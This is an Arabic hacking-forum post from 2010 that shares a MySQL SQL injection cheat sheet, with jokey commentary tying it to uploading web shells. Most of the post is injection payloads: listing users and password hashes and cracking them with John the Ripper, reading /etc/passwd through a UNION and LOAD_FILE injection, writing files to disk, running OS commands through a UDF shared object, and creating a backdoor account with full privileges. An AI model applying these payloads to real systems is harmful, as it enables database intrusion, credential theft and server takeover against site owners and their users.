التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-17-2010, 06:25 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي Injection Cheat Sheet - # MySqL


السلام عليكم ورحمه الله وبركاته

اليوم جبت لكم موضوع روعه تحبونه كلكم


لكن الي راح تزعلو منه اني مش راح اترجم لانه امر ومعناه وما يصح ترجمته

ركزو تفهمو ن :]


mysql-sql-injection-cheat-sheet


Version

كود:
SELECT @@version

Comments

كود:
 SELECT 1; #comment
SELECT /*comment*/1;



Current User
كود:
SELECT user();
 SELECT system_user();



List Users

كود:
SELECT user FROM mysql.user; -- priv


List Password Hashes
كود:
SELECT host, user, password FROM mysql.user; -- priv


Password Cracker
كود:
John the Ripper  will crack  MySqL  password hashes
.




List Privileges
كود:
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
كود:
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs

فوق امر برايفت عشان نرفع شيل هع هع خليكم تكتشفونه لحالكم ما رح اكمل كلام ............

كود:
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)


كود:
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns



List DBA Accounts
كود:
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';

كود:
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv


Current Database

كود:
SELECT database()

List Databases

كود:
SELECT schema_name FROM information_schema.schemata; -- for  MySqL  >= v5.0

كود:
SELECT distinct(db) FROM mysql.db -- priv8

List Tables
كود:
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'


Find Tables From Column Name
كود:
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'

Select Nth Row

كود:
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0

Select Nth Char
كود:
SELECT substr('abcd', 3, 1); # returns c


Bitwise AND
كود:
SELECT 6 & 2; # returns 2
كود:
SELECT 6 & 1; # returns 0

ASCII Value -> Char

كود:
SELECT char(65); # returns A

Char -> ASCII Value

كود:
SELECT ascii('A'); # returns 65

Casting
كود:
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);


String Concatenation

كود:
 SELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement
كود:
 SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement
كود:
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A


Avoiding Quotes

كود:
SELECT 0x414243; # returns ABC


Time Delay
كود:
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12



Command Execution
بصراحه اول مره اسمع فيها بس قويه كثير :S
بحاول انزل لكم عليها فيديو

كود:
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.

Local File Access
كود:
...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read 
world-readable files.
كود:
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
خخ بتوقع الامر الثاني يعجبكم كثير :]


Create Users
كود:
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users

كود:
DROP USER test1; -- priv

Make User DBA
كود:
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

Location of DB files
كود:
SELECT @@datadir
;




اتمنا انكم تفهمو الاستعلاماات :D

موفقين


Injection Cheat Sheet - # MySqL

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection Black-FoG SQL قواعد البيانات 73 03-14-2014 09:08 PM
ماهو الفرق بين SQL Injection و Blind SQL Injection amer176 جـــ'ابات العناكــ'ب 6 10-04-2010 04:13 PM
Mysql Injection,Admin Login,Shell Upload Sniper_Mo قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 07-03-2009 01:49 PM
Rooting a linux box via MySQL Injection GoLdeN-z3r0 قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 2 05-05-2009 05:11 AM


الساعة الآن 02:33 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0